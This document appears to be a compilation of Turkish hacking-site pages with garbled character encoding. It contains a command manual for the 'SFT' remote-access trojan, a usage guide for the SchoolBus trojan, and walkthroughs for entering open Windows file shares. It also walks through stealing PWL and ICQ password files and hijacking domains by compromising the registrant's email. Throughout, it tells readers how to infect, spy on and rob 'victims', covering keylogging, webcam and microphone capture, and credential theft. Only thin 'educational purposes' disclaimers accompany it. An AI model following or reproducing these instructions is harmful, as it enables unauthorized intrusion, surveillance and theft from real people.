EXECHIDE komutu ile kar bilgisayarda gizlice bir bat dosyas altrabilirsiniz. Bylece istediiniz MS-Dos komutuyla istediinizi yapabilirsiniz. Yada program yazyorsanz, istediiniz bir ey iin program yazp gizlice altrabiliriniz... REGISTRY'e ait komutlarla istediiniz her trl ayar ve veriyle oynayabilirsiniz. Her trl program takeover yapabilirsiniz. Ksacas bu program, bilgisayar bilen bir kullanc iin, sistemi sonuna kadar amaktadr. Bu programn yapabilecekleri , sizin bildiklerinizle snrldr. Eer ki FTP kullanmay bilmiyorsanz, masastn bile gremezsiniz. SFT Kullanlmas iin bilgiye ihtiya duyan, profesyonel, komutlarla alan bir trojandr. Daha basit bir trojan iin SchoolBus TR' denemelisiniz. Kullanlmas en kolay trojan olduunu syleyebilirim. SchoolBus TR, SpyMasterSnake.Org maldr. SFT, FTP Komutlaryla beraber 100'n zerinde komut iermektedir. Bu trojan, elenceden ok, sistemi ele geirmek, bilgi szdrmak amal yaplmtr. Trojann FTP ilevini kapatmak ve sadece bir KeyLogger gibi kullanmak istiyorsanz, Server editrde sa tklayp, "Server Port Amasn" ksmn iaretleyiniz. Bu sayede server ald makinada sadece Sendlog ilevlerini yerine getirecektir. Unutmayn ki, bu zellii atnz zaman, kapatma ansnz bulunmamaktadr ve server'a "updateserver" yada "remoserver" gibi komutlar veremezsiniz.... Bu trojan kendim iin hazrladm bir trojandr. Ama bunu bir proje haline dntrdm. Ve FTP Trojan yanna bir de HTTP Trojan (SpyMasterSnake HTTP Trojan[SHT]) ile bu projedeki kilit Clientsiz kullanm olana dorua karacam. HTTP Trojan ile kurbannza herhangi bir web browser ile balanabileceksiniz. Bir web sitesine girmi gibi, kurbann bilgisayarn kontrol edebileceksiniz. Ksacas Client=Browser olacak :) Bylece SpyMasterSnake.Org'un ilkleri ve farkl olan yapma gelenei devam etmi olup, bu piyasada, Trkiye'de, dnerek bireyler rettiimizi gstermi olacam. Slogan ayn, "Var olan zaten vardr; nemli olan olmayan yapmaktr".... RAS Parametresiz alr. Bu komut girildiinde, Dial-Up ifreleri, HomeDir altna "Ras" olarak kaydedilir. SERVERINFO Parametresiz altrldnda server ayarlarn FTP Loguna yazar. SAVE: Bu parametre ile altrldnda server ayarlarn HomeDir altnda "Servinf" olarak kaydeder. SHUTDOWN Kurbann bilgisayarn kapatr. GETCACHEDPASS

Sadece Win9x makinelerde alr ve bilgisayarda ifre diye kaytl tutulmu olan verileri gsterir. HomeDir altna "Cached" olarak kaydedilir. URLHISTORY

Kurbann internet explorer ubuuna yazarak girdii siteleri registryden alr ve "History.reg" olarak kaydeder. SENDKEYS

Kurban bir yerlere yaz yazarken, bu komutla onun yazdklarnn yanna sizin yazdklarnz ekleyebilirsiniz. rnek: "senkeys Selam, Nooluyo Burda??" SNDRECORD

ON: Kurbann bilgisayarnda bir mikrofon takl ise, mikrofon giriini mixer ayarlarndan aarak kayt yapmaya balar. Bu esnada OFF komutu girilse kayt o anlk durur. Devam etmek iin ON komutu gerekir. OFF: Kayt o anlk durdurur. SAVE: Kayt durmusa, HomeDir altna SndCapture.wav olarak Kaydeder. Eer durmamsa, durdurup kaydeder. KEYBOARDLOCK

ON: Klayve ve mouse' kilitler. OFF: Kilitlenen Klavye ve mouse' tekrar aar. BEEP

Komut girildikten sonra Kasa Speaker'ndan (Ses kartna yada hoparlre ihtiya yoktur), en nce Smooth Criminal melodisi almaya balar. Daha sonra ise uzun bir ambulans sireni duyulur. alma ilemi bittikten sonra FTP logundan size haber verilir. ICQPASS2003

ICQ 2003 ve Lite'n ifrelerini almanz salar. Lite versiyonda, ifre kaydedilme seili deilse bile ifreyi alabilirsiniz. ICQ'nun nceki srmlerindeki ifreleri alamazsnz. Bunun iin ICQ klasrndeki *.dat ve *.idx dosyalarn almalsnz ve internette bulunan ICQHR gibi history okuyan yada ICQrInfo gibi ifre okuyan programlar kullanabilirsiniz. SENDERROR

Bu komutla kullancya istediiniz hata mesajn gsterebilirsiniz. rnek: "senderror lemcide Su Bulundu, Windows Batacak!!" WEBCAM

Kurbann bilgisayarnda bir kamera takl ise, kameray aar ve bir grnt alp kapatr. Alnan grnty HomeDir altna Webcam.jpg olarak kaydeder.

HIDETASKBAR Balat butonunun zerinde bulunduu SystemTray ubuunu grnmez yapar. SHOWTASKBAR Balat butonunun zerinde bulunduu SystemTray ubuunu grnr yapar. DOWNLOADFROMNET Kurbann bilgisayarna internetten bir dosya indirir ve HomeDir Altna "Downloaded.ext" olarak kaydeder. Ne download ederseniz edin bu dosya ad deimez. Download ettiiniz eyin uzantsn ".ext" ile deiitirip kendi bilgisayarnza download edin. KILL alan herhangi bir program kapatr. alan programlar grmek iin "Proclist" komutunu kullanabilisiniz. rnek: "kill icq.exe" PROCLIST alan programlar, grnen program pencerelerini ve grnmeyen program pencerelerini HomeDir altna "Proc" olarak kaydeder. EXEC Herhangi bir program yada dosyay, zerine ift tklanm gibi altrr. EXECHIDE Bir program veya komut, *.bat dosyasn gizli bir ekilde altrr. Kurban alan program grmez. Ancak her *.exe uzantl program grnmez olarak altrlamaz. RESTARTSERVER Server iin yaplan deiikliklerin kaydedilmesini salayan ve server tekrar balatan komuttur. Bir ok ayar deitirdikten sonra bir kere bu komutu girmenizde yeterli olacaktr. SYSINFO Kurbann bilgisayaryla ilgili bilgileri gsterir. rnein, CPU ad, hz, iletim sistemi gibi... HomeDir altna "Sys" olarak kaydedilir. MSJ Kar taraf ile chat yapmanz salar. Kurbann yazdklar size FTP logu ile gzkr. Kurban chat ekrann arka plana alamaz, kapatamaz, tayamaz. Komutu bir mesajla kullanmanz lazmdr. Her yazacanzn bana "msj"

komutunu yazmalsnz. Aksi takdirde yazdklarnz komut olarak alglanr. rnek: Siz: "msj selam naber?" Cevap: "250 iidir senden?" Siz: "msj bende iyiyim saol" MSJOFF

MSJ komutu ile alan chat penceresini kapatr. Bu pencere sizin balantnzn kopmas ile de otomatik kapanabilmektedir.. WEBPAGE

Kurbann bilgisayarnda bir web sitesi aar. Komutu kullanrken URL bana "http://" koymazsanz komut almayacaktr. Bir FTP sitesini gstermek iin "ftp://". Outlook gibi mail programlar iin "mailto://" koyabilirsiniz. rnek: "webpage http://www.spymastersnake.org" yada "webpage mailto:// admin@spymastersnake.orgBu mail adresi spam botlara kar korumaldr, grebilmek iin Javascript ak olmaldr" CDROM

Kurbann CD-ROM'unu aar, 5 sn ak bekletir ve daha sonra kapatr. Bu ilem srasnda size FTP logundan bilgi yollanr. CAPTURE

Kurbann bilgisayarn ekrannn grntsn alr ve HomeDir altna "sc.gif" olarak kaydeder. Bu dosyann bykl yaklak 23-30 KB kadardr. Grnt kalitesi iyidir, sadece 256 renktir. Komut parametresiz girilince o an iin aktif hale gelir. ONLINE: Kurban internetteyken saat ba yada sizin ayarladnz dakika sresince bilgisayar ekrannn grntsn alp kaydeder. HOUR: Bilgisayar ak olduu srece saat ba bilgisayar ekrannn grnts kaydeder. SETMINUTE: Saatba yerine, isteiniz dakika sreince capture ilemi yaplr. Kullanm: rnein 5 dakika iin girilece komut "capture setminute+5" dir. Burdaki "+" toplama ile alakal deildir. Bu ekilde verilen bir komut, bilgisayar ekrannn her 5 dakikada bir grntsnn alnp, HomeDir altna kaydedilmesini salar. OFF: Capture komutunu kapatr. Bylece bilgisayar ekrannn grnts bir daha alnmaz. PLAYWAV

Homedir altna kaydetmi olduunuz Wave dosyasn alar. rnein Homedir altna "BillieJean.wav" isimli bir dosyay upload edersek. rnek: "playwav billiejean.wav" komutunu girmek yeterlidir. SETUSERNAME

Servern FTP kullanc adn deitirir. rnek: "setusername gokhanmuh" daha sonra restartserver komutu gerekir.

SETPASSWORD Servern FTP ifresini deitirir. rnek: "setpassword 123456" daha sonra restartserver komutu gerekir. SETPORT Servern FTP portunu deitirir. rnek: "setport 21" daha sonra restartserver komutu gerekir. SETURL Sender URLyi deitirmenizi salar. rnek: "seturl http://www.sizinsiteniz.com/ipsender.php" daha sonra restartserver komutu gerekir. VICTIM Kurbann adn deitirir. rnek: "victim LittleSusie" daha sonra restartserver komutu gerekir. SETHOMEDIR Kurbana balandnzda, sizin masastnz olacak olan klasrn yolunu deitirir. rnek: "sethomedir sfthomedir" daha sonra restartserver komutu gerekir. Dikkat: Btn homedirler Windows klasr altndadr. Bu yzden yolu girerken iinde src ad kullanmaynz ve banda yada sonunda "\" iareti bulundurmaynz!!! rnein Win98 kurulu bir bilgisayarda HomeDir'i "C:\Windows\System\homedir" gibi bir klasr yapmak iin "sethomedir System\homedir" yazmanz gerekmektedir. HomeDir her zaman bo ve sistem klasr olmayan bir klasr olmaldr. SETRUNDIR Servern EXEsinin alaca klasrdr. HomeDir Gibi Windows Altndadr. Ve asla HomeDir ile ayn olmamaldr!! rnek: "setrundir System" daha sonra restartserver komutu gerekir. Dikkat: Btn Rundirler Windows klasr altndadr. Bu yzden yolu girerken iinde src ad kullanmaynz ve banda yada sonunda "\" iareti bulundurmaynz!!! rnein Win98 kurulu bir bilgisayarda RunDir'i "C:\Windows\System" gibi bir klasr yapmak iin "setrundir System" yazmanz gerekmektedir. SEARCH Kurbann bilgisayarnda bir dosyay aramn salar. Dosyay ararken "*" iarei kullanlmal veya tam dosya ad girilmelidir. Sonular HomeDir altna Search.txt olarak kaydedilir. rnek: C:\ altndaki klasrlerin birinde DangerousWorldtour1.jpg, DangerousWorldTour2.jpg.... gibi dosyalar bulunsun. Bunlarn hepsini aramak iin: "search C:\+DangerosusWorldTour*.jpg" komutu girilmelidir. Byledece "*" karakterinden nce elenen her dosya bulunur. Mesela DangerousWorldTour36.jpg gibi bir dosyay bulmak istiyorsak. "search

C:\+DangerousWorldTour36.jpg" yazlmas lazmdr. Tm JPG dosyalarn bulmak iin "search C:\+*.jpg" yazlmaldr. inde Dangerous kelimesini banda ieren bir dosyay bulmak iin ise "search c:\+dangerous*.*" Burdaki "+" aranacak dosya ile iinde aranacak klasr ayran bir karakterdir. Konmas zorunludur. ADDREG Registry'e bir Girdi ve deer girmenizi salar. Bu deer bir Dize deeridir. rnek: "addreg HKEY_LOCAL_MACHINE+SOFTWARE\Mirabilis+Benim Girdim+Benim Deerim" bu komut ile <HKEY_LOCAL_MACHINE\SOFTWARE\Mirabilis> anahtar altna <Benim Girdim> diye bir dize deeri ve <Benim Deerim> adnda bir value atam olduk. Burda kullanlan "+" iaretlerini ayn ekilde kullannz. READREG Registryden bir deer okumanz salar. Bu deer bir Dize deeridir. rnek: "readreg HKEY_LOCAL_MACHINE+SOFTWARE\Mirabilis+Benim Girdim" bu komut ile <HKEY_LOCAL_MACHINE\SOFTWARE\Mirabilis> anahtar altna <Benim Girdim> deeri okunmu olur. Eer Yukardaki rnei denediyseniz, bu <Benim Deerim> sonucu olacaktr. Sonular FTP logunda grnecektir. IMPORTREG Homedir altnda bulunan *.reg uzantl dosyalar registry'e girer. Komutun almas iin kar makinede regedit.exe silinmemi olmas lazm. rnek: "importreg Girdi.reg" Girdi.reg burda HomeDir altndadr. EXPORTREG Registryden bir anahtar tm zellikleriyle ve alt anahtarlaryla *.reg dosyas haline evirir ve HomeDir altna Exported.reg olarak atar. rnek: "exportreg HKEY_LOCAL_MACHINE+SOFTWARE\Mirabilis" bu komut ile <HKEY_LOCAL_MACHINE\SOFTWARE\Mirabilis> anahtar altndaki tm anahtarlar ve girdiler Exported.reg olarak kaydedilir. SENDLOG ON: Kaydedilen, ifre, log, cliplog gibi her trl bilgiyi Sender url zerinden yollar. OFF: Bu zellii kapatr. CLIPBOARDLOG Komut parametresiz girilince o an iin aktif hale gelir. ONLINE: Sadece kurban online iken kopyalanan textlerin kaydn tutar. HomeDir altna "ClipLogged" olarak kaydeder. ALL: Bilgisayar akken kayd tutar. Sadece Online iken deil. OFF: lemi kapatr. LOG

Komut parametresiz girilince o an iin keylogger' aar. ONLINE: Bilgisayar online iken, kurbann yazd hereyi kaydeder. HomeDir altna "Logged" olarak atar. ALL: Sadece onlie iken deil, her zaman ilemi yapar. OFF: lemi kapatr. SENDMSG

Kurbann ekranna bir mesaj yollar. rnek: "sendmsg SelamnAleykm" MAXCLIENTS

Parametresiz girilince o oturum iin en fazla ka kullancnn balanacan gsterir. Parametre ile girilince o oturum iin maximum kullanc saysn belirler. rnek: "maxclients 20" UPDATESERVER

Server' yeni bir versiyonuyla deitirir. Bunun iin yeni versiyonu ayarlayp, HomeDir altna atmalsnz. rnek: "updateserver YeniServer.exe" YeniServer.exe HomeDir altnda olmaldr. Eerki server editr ifresi varsa u ekilde kullanlmal. rnek: "updateserver Editrifresi+YeniServer.exe" + areti Konmak zorundadr. REMOVESERVER

Server' kaldrr. Eer ki server'nza bir editr ifresi koyduysanz. O ifreyide girmeniz gerekmektedir. rnek: "removeserver" yada "removeserver editrifresi"

SERVERHELP HomeDir altna "Help.html" olarak, bu yardm dosyasn kaydeder..

2004 - SpyMasterSnake.Org Mechatronic X Security NetWork - Gkhan Muharremolu Turkey's Unique, Real, Legendary & Best CompuTech Security Site <!--[if !supportLineBreakNewLine]--> <!--[endif]-->

SCHOOLBUS PROGRAMI KULLANIMI

ncelikle Schoolbus ile girdiiniz makinalarda neler yapabileceinize bakalm.

*Mesaj gnderme *Chat ama *Password leri alma *Windows'u gertme *Dosya kontrol *Dosya transferi (upload, download) *Web sayfasyna gnderme *Program altrma (parametre kullanilabilir.. yani format bile atabilirsiniz) *Mouse kontrol *Mouse tularnn yerini degistirme *Windows'u shut down etme *Cd ama/kapama imdi program nasl kullanabileceinizi anlatacam. nternetten ektiiniz zipli haldeki Schoolbus programnn iinde "server.exe" ve "client.exe" olmak zere iki program bulunur. Bunlardan "server.exe" gireceiniz makinada almas gereken dosyadr ve bunu sakn kendi makinanzda amay.Bakalarnn bilisayarlarna girmeniz iin ncelikle bu dosyann daha nceden o makinada almas gerekir.Diyelimki "server.exe" yi birisine mirc yoluyla veya icq ile gnderdiniz ve amasn saladnz. imdi yapmanz gereken ey kendi makinanzda "Client.exe" yi almak. Clienti altrdktan sonra trojenli (yani server.exe nin bulunduu) makinann ipsini sa steki bolua yazyorsunuz ve "Connect to" tuuna basyorsunuz ve "Connect to" yazan yerde "Disconnect" yazana kadar bekliyorsunuz. te sonunda Disconnect yazd ve programn zerindeki btn dmeler aktif hale geldi ve kar bilisayara girmeyi baardnz tebrikler.:)) imdide Clientin zerindeki programlarn ne ie yaradna bakalm: Change Server Port : Kar bilisayarndaki trojenin portunu deitirmenize yarar.(Schoolbus Portu 54321'dir. Buradan bu portu istediiniz gibi deitirebilirsiniz. Enter Server Password : Servera ifre koyarak sizden baka kimsenin bu makinaya girmemesiniz salayabilirsiniz. Get System Passwords : Bu tula bilisayardaki btn ifreleri alabilirsiniz. (rnein internet ifresi, e mail ifresi, icq ifresi gibi.) Get Cached Passwords : Eger Get system passwords le ifreleri alamassanz bu tua basn ve girdiiniz makinann kapanmasn bekleyin veya kendiniz resetleyin kullanc tekrar nete girdiinde nceden yazmayan ifrelerini artk grebilirsiniz. Clear Password : Koyduunuz server ifresini kaldrr. File Maneger : Kar makinadan dosya download etmenize ve upload etmenize yarar. Application Maneger : Kurban'nn bilisayarndaki ak program ve pencereleri gsterir buradan istediiniz program veya pencereyi kapatabilirsiniz. Keyboar Maneger : Kurbann yazdklarn grebilir ve eger chat yapyorsa onun adyla sizde buradan chat yapabilirsiniz. Crash Windows : Kurbann makinasn kilitleyebilirsiniz.

Shut Down Windows : Kurbann makinasn kapatabilir veya resetleyebilirsiniz. Close Server : Kurban makinasn kapatana kadar o makinadaki trojeni kapatabilirsiniz bylece kimse giremez.Tabi makina tekrar alnca gene girebilirsiniz. Ip Scanner : Buradan mircte aldnz pleri (irc ortamnda ip grenme komutu /dns nick Dir.)(mesela 212.253.50.18 olarak bir ip aldnz p Scanner ksmna aldnz ipnin yanlz 212.253.50 ksmn yazarsanz daha iyi olur)tarata bilirsiniz.Scanner sonunda trojenli bir ip bulursa sa tarafta kmaktadr. Remove Server : Kar makinadaki Schoolbus trojenini silebilirsiniz. Send Massage : Kar tarafn ekrannda windows hatas gibi grnen mesajlar gnderebilirsiniz. Open Chat : Kartarafn ekrannda kan ve kapatamad bir sayfa aarsnz ve buradan onunla chat yapabilirsiniz. Goto Web Page : Kurbann browsrnda istediiniz bir web sitesini aabilirsiniz. Run Programme : Kurbann hdd deki programlar altrabilir ve Kurbann makinasna Format atabilirsiniz(format C srcsne atamyorsunuz) Open Cd Drive : Cd Srcnn kapan aabilirsiniz. Close Cd Drive : Atnz Cdrom un kapan kapatabilirsiniz. Swap Mause Button : Kurbann mause sinin tularnn yerini deitirebilirsiniz. Control Mause : Kurbann mausunu kontrol edebilirsiniz. Hide TaskBar : Kurbann ekranndaki Balat ubuunu gizleyebilirsiniz. Show TaskBar : Sakladnn Balat ubuunu tekrar eski haline getirebilirsiniz. Torn Off Monitr : Kurbann monitrn kapatabilirsiniz. Torn On Monitr : Monitr tekrar aanilirsiniz. Get Icq Uns : Kurban eger icq kullanyorsa kurbann icq numaralarn alabilir ve ne zaman online olduunu bylece anlayabilirsiniz. Change Data/Time : Kurbann bilgisayarnn tarihini ve saatini deitirebilirsiniz. Capture Deskopt : Kurbann ekranndaki grntnn resmini ekebilir ve resme bakabilirsiniz. Set Wallpaper : Ekrann arka plan grntsn deitirebilirsiniz

PROJECT R3x PROGRAMI


Angry ip.scanner Essantial Net Tools Programlar Kullanma Ak Share Bilgisayarlara girmek iin kullanlan programlar olup kullanmlar HACK blmmzde anlatlmt. Project R3x Programda Kullanma ak share

bilgisayarlara giri iin kullanlan bir program olup, kullanm ekli aada anlatlmtr.

Bilgisayarlara girebilmemiz iin ncelikle a ayarlarmzn tam olmas gerekiyor. Hack Blm Angr p Scannerin anlatmndaki a ayarlarnn ayns burada da geerlidir. Angr a ayarlar Resimli blmdeki a ayarlarnz aynen yapnz. A ayarlarnz zaten mevcutsa a ayarlarnzla oynamayanz.

Resimde grlecei zere Scan Wrom: GDADRZFSQHYUCDDJBLVLMHAALPTCXLYRWTQTIPWIGYOKSTTZRCLBDXRQBGJS NBOHMKH basyoruz. p aralndaki bilgisayarlar listeleniyor.

<!--[if !vml]--> <!--[endif]-->

imdi teker teker denemeye baslyoruz en batan sa tua basp .

<!--[if !vml]--> <!--[endif]-->

5sn bekledikten sonra adamn bilgileri nmze kyor(Username,Paylamlar,MAC adresi falan filan.)

<!--[if !vml]--> <!--[endif]-->

grld zere bilgisayarna girilebilecek olanlar resimde grlecei zere shares blmnde c d gibi dizinleri grnenler. c nin zerine iki kez tklyoruz biraz bekledikten sonra dier bilgisayara hemen balanyoruz. Burada verilen bilgiler eitim amaldr. Bir bakasnn bilgisayarna girip de zarar vermek size hi bir ey kazandrmaz. Uyarmak ise ok ey kazandrr. Kullanm iin ne verilmise sadece onunla yetininiz. .

PAYLAIMA AIK BLGSAYARLARA NASIL GRLR


Gerekli Programlar

Angry ip Scanner: Paylama ak bilgisayarlar IP aral esasna gre arar.

A Ayarlar:Angry IP Scanner Pragramn altrabilmek iin ncelikle bilgisayarmzdaki a ayarlarnn en az resimdeki a ayarlar n iirmesi gerekmektedir. Eer a ayarlarnz aada belirtilen a ayarlarn iermiyorsa ncelikle a ayarlarnz en az aadaki ekilde ayarlamanz gerekir.

BALAT : AYARLAR : DENETM MASASI : A FT TIKLAYIN VE AYARLARINIZI YAPIN AYARLARINIZ ZATEN MEVCUTSA A AYARLARINIZLA OYNAMAYIN DOSYA VE YAZICI PAYLAIMINDA BAKALARINA DOSYALARIMA ERM HAKKI VEREBLMEK STYORUM SEENEN KESNLKLE KULLANMAYIN.!!!!!!!!!!!!

<!--[if !vml]--> <!--[endif]-->

UYARI : 1- Burada verilen bilgiler eitim amaldr.. Ltfen kt niyetli olarak kullanmayn...

2- Kiilik haklarna saygmzdan dolay rnek verilen IP ler ve paylama alm bilgisayarlar listesi tamamen montaj teknii kullanlarak hazrlanm ve hayal rndr. ANGARY P SCANNERN KULLANIMI: Angry IP Scanner programn altrn ve IP range kutusuna scan edilecek IP yi yazn. Eer tek IP yi scan edecekseniz to ksmnada ayn IP yi yazn. Eer belirli bir IP araln scan edecekseniz IP range ksmndaki ip no sunun son numaras 1 olacak to ksmndaki IP nimarasnn son rakam ise 255 olacaktr.Bu andan itibaren start butonuna basn ve scan ilemini balatn. <!--[if !vml]-->

<!--[endif]-->

Scan ilemi devam ettikce paylama ak veya kapal bilgisayarlar listelenecektir. Resimde de grlecei zere bilgisayarn ak veya kapal olduu balant hzlar Hostnameleri ak portlar yani ksaca bilgisayara girilip girilemeyecei anlalmaktadr. Genelde mavi iaretlilerin zerine gelerek. Sa tua tklayp Open computeri iaretlerseniz karnza bir men daha alacak ve o mende nt Explorer i seip Entere basp bekliyoruz. Bu andan itibaren Kar bilgisayarla balant kurulmaya balar ve ekran donmu gibi olur.. Panie kaplp bilgisayar resetlemeyin windows gezgini gibi bir ekran kp size "c", "d", "belgelerim" gibi dizinler gsterirse ne alaaaa. gstermezse.. baka bir bir IP aral yazarak denemelerinize devam

edin. <!--[if !vml]--><!--[endif]-->

Sprizzzzz eer aadaki ekran gryorsanz. o paylama ak bilgisayara giri ifreli demektir.. Bu tr bilgisayarlara girmek iin bir takm ifreler denemek gerekir. Zor i En iyisi bir baka IP ye gein

<!--[if !vml]--> <!--[endif]--> Zarar vermek size hibir ey kazandrmayacaktr.. Uyarmak ise bir ok ey kazandrr... Burda nemli olan nokta.. Eer paylam sadece okuma iin verilmise sadece dosya alabilir veya inceleyebilirsiniz.. Eer paylam tam yetki ile verilmise. Kendi harddiskinizmi gibi istediiniz ekilde kullanabilirsiniz.

NOT : BAZI BLGSAYARLARADA GRM GB GRNR FAKAT C D VB SMGELER GREMEZSNZ. BU DURUMDA PC FREL DEMEKTR.

NBTSTAT LE KARI PC Y TROJANSIZ ELE GERMEK


Dos komut satirinda nbtstat -A <IP adresi> komutunu veriyoruz. Basarili Olmussak: NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------^M0REBID <00> UNIQUE Registered VIRTUAL COMPUTE<00> GROUP Registered ^M0REBID <03> UNIQUE Registered MAC Address = 44-45-53-54-00-00 gibi bir cikti almamiz gerekir. Burada ^MOREBID bilgisayarin ismidir. Bizim icin nemli olan da bu. c- Windows dizininin altinda lmhosts isminde bir dosya olusturuyoruz. ("Edit lmhosts" komutuyla) Eger ki daha nceden lmhosts dosyasi varsa bile yapacagimiz is: x.x.x.x ^MOREBID satirini eklemek (x.x.x.x IP adresi, ^MOREBID bilgisayarin adi) d- Simdi de dos komut satirinda nbtstat -r komutuyla lmhosts dosyasina eklediklerimizi networkumuze tanitiyoruz. e- Simdi Windows'a dnme zamani. Baslat/Bul/Bilgisayarlar menusunden UNIQUE adini vererek (Yukarida ekran ciktisinda ^MOREBID <00> UNIQUE Registered satirindaki Unique) bilgisayari aratiyoruz. Bu islemler yaptiktan sonra bilgisayar bulunuyor. Bilgisayar seklinin uzerine cift tiklayip harddiskini grebiliyoruz. Not: Bu olay kirmak istediginiz ana bilgisayarin dosya paylasimina acik olmasi durumunda calisir.

MANUEL YNTEMLE PWL FRES ALMA


MANUEL YNTEMLE PWL FRES ALMA GEREKL PROGRAMLAR

1-Essantial net tools veya r3x 2-pwl tool program ncelikle a ayarlarmz aadaki gibi olmas gerekiyor a ayarlar detayl anlatm angry ip scan blmnde var Microsoft alar iin istemci evirmeli Badatrc IPX/SPW uyumlu iletiim kurallar NetBEUI TCP/IP BRNCL A OTURUM KISMINA SE Microsoft alar iin istemci ayarlarn yapyoruz. kesinlikle bakalarna dosyalarma eriim hakk verebilmek istiyorum seenei iaretlenmiyor bo braklyor. 4-Essantial Net Toolsu kurduktan sonra Nbscan ksmnda Starting ip adres blmne balang ip no. 195.175.222.1 Ending ip adres blnne biti ip no 195.175.222.255 yazyoruz ve starta basyoruz paylama ak ve kapal bilgisayarlar listelenmeye balad yes olanlarn zerine tklyoruz daha sonra sa tua basp opencomputeri seiyoruz biraz bekledikten sonra kar bilgisayarla balant kurulmu oluyor. Kar bilgisayarn c dizinini ak grdysek; sra geldi pwl dosyalarn almaya; 5-KARI PC NN PWL DOSYALARINI ALMA: evet c dizinini ak grdysek dedik; c dizini ak bilgisayarn ip numarasn:mesela(195.175.222.255) BALAT/BUL/DOSYALAR VE KLASRLER E GELYORUZ AD KISMINA: *.pwl yazyoruz KONUM KISMINA:\\195.175.222.255\c\windows\ yazyoruz imdi bula basyoruz. ok ksa bir zaman iinde windows dizininde bulunan btn pwl dosyalar alt tarafa teker teker listeleniyor. Enderde olsa baz pwl dosyalar bo kabilir. Bazlarnda aradmz dialup ifreleri olmayabilir. Bazlarnda ise 10 tane birden ifre kabilir ne karsa bahtna ama genelde mutlaka kar. evet tespit edilen ifreleri tmn se diyoruz daha sonra kopyala diyoruz kopyaladkdan sonra deskopa yani masa stne gelip yaptr diyoruz biraz bekledikten sonra btn pwl dosyalar masa zerine kopyalanyor. krmz yazyla pwl yazan dosyalarn zerine iki kez tklyoruz pwl tool otomatik olarak btn ifreleri nmze getiriyor. Eeee artk bu anlatmdan sonra ikide birde bana u saatler aras ifre, bana sper ifresi ,bana ttnet ifresi falan istemezsiniz herhalde:))) Kendi iini kendin greceksin. Hadi bakalm kolay gelsin MANUEL YNTEMLE ICQ FRES ALMA ister essantial ister rx3 ister angry ip scan programlar vastasyla kullanma ak bilgisayarlar tespit ediyoruz. Bu programlarn hepsinin kullannm ayrntl bir biimde anlattm dier blmlere baknz bu programlar vastasyla c dizinini ak bulduumuz bilgisayarlar dan cq ifrelerini almaya balyoruz. imdi gelelim adamn icq ifresini nasl alcaz.Bunun iin yine Balat>Bul>Dosyalar ve Klasrler'e giriyoruz.Bu sefer Konuma Konum : \\212.253.25.14\c\Program Files\ICQ\ yazyoruz. Ad: *.dat yazyoruz ve yine bekledikten sonra nmze ok sayda dat dosyas kyor bunlardan sayl olan yani 123456.dat gibi olan dosyay ekiyoruz.123456tmp.dat ekmenize gerek yok.Sonra icqcrack programn

ayoruz(Advanced ICQ Password Recovery) dosyaya basyoruz 123456.dat dosyasn seiyoruz ve hooop ite adamn icq passwordu.

ICQ HACKLER GB DOMAN HACKLEMEK


ICQ uin almann genel mantn artk hemen hemen herkez biliyor.. Ksaca hatrlatacak olursak bir icq uinini almak istediimizde ilk ncelikle onun infosuna bakarz..E-maili yazlm diye eer e-mail yazlysa ilk nce o maili hacklemeye alrz eer ele geirirsek http://www.icq.com/password adresinden mailini ele geirdiimiz uinin ifresini o uinin mailine yollatp kolaylkla ifreyi alrz..Bunu hepimiz biliyoruz yani bir icq'nun mailini aldktan sonra ifreyi e-maile yollatmay..

imdi size domain hacking olaynn Icq hack olaynla kesitii noktay anlatacam..imdi hacklemek istediiniz domaini ilk ncelikle bir icq uin olarak dnn.. Bir icq uinin infosuna bakmak iin icq dan o uini aratrz ve o kiinin ismini, soyismini e-mail adresiini v.s. grebiliriz.

Bu yntem domain iin de geerli yani bir domain'in bilgilerini grmek istiyorsak ona whois ekeriz yani bir nevi infosuna bakarz..Size bir ka whois ekebileceiniz adres vereyim mesela http://www.arama.com/domain.php3 mesela http://www.opensrs.org/cgi-bin/whois.cgi

Mesela girdik "http://www.arama.com/domain.php3" hangi domaini hacklemek istiyoruz atyorum kacak.com (aklmda uan bu var maili hotmail olan) Kacak.com u arattmzda karmza u bilgiler kacak; (sadece info blmn yazyorum buraya )

NOV-01 Expires on: 07-NOV-02 Last Updated on: 07-NOV-01 Administrative Contact: Buyukyogurtcu, Emre emrebuyukyogurtcu@hotmail.comBu mail adresi spam botlara kar korumaldr, grebilmek iin Javascript ak olmaldr kacak.com plaza 1/1 istanbul, istanbul 12345 TR +901234567891 +901234567891 Technical Contact: Buyukyogurtcu, Emre emrebuyukyogurtcu@hotmail.comBu mail adresi spam botlara kar korumaldr, grebilmek iin Javascript ak olmaldr kacak.com plaza 1/1

istanbul, istanbul 12345 TR +901234567891 +901234567891 Domain servers in listed order: NS1.EASYDNS.COM NS2.EASYDNS.COM REMOTE1.EASYDNS.COM REMOTE2.EASYDNS.COM

Evet grdnz gibi " emrebuyukyogurtcu@hotmail.comBu mail adresi spam botlara kar korumaldr, grebilmek iin Javascript ak olmaldr " bu domain'e ait mail.. Eee ne demek peki bu ?? Bu demektir ki bu maili hacklersek biz kacak.com domaininin ifresini emrebuyukyogurtu@hotmail.comBu mail adresi spam botlara kar korumaldr, grebilmek iin Javascript ak olmaldr 'a yollatabiliriz. (ifremi unuttum gibi.) Diyelim hackledik yapacamz 2. adm yine icq ifresini yollatr gibi o domainin ifresini maile yollatmak.. E peki nereden yollatacaz ??

Domainlerin www.icq.com/password gibi sabit bir adresi yoktur yani btn domainlerin ifrelerini bir adresten yollatamayz. ifreyi yollatmak iin illaki o domainin registerland irketin web sitesine girip oradan yollatmalyz..

Peki domain'in hangi irketten alndn nasl anlayacaz ? Yine domain'e whois ektiimizde karmza yle bir bilgi kyor

Domain Name: KACAK.COM Registrar: DOTSTER, INC. Whois Server: whois.dotster.com Referral URL: http://www.dotster.com/help/whois Name Server: NS1.EASYDNS.COM Name Server: NS2.EASYDNS.COM Name Server: REMOTE1.EASYDNS.COM Name Server: REMOTE2.EASYDNS.COM Updated Date: 07-nov-2001

Registrar: DOTSTER, INC. Whois Server: whois.dotster.com Ksmna bakarsanz bu domain'in DOTSTER diye bir irket tarafndan register edildiini greceksiniz.. imdi http://www.dotser.com a girip orada " ifremi unuttum " sayfasn bulup ifreyi e-mailmza yollatabiliriz..

NOT: Bu yntemi icq uin hacklemek iin de kullanabiliriz yani bir icq uinin nun infosuna bakp e-mail adresinde atyorum ahmet@mehmet.comBu mail

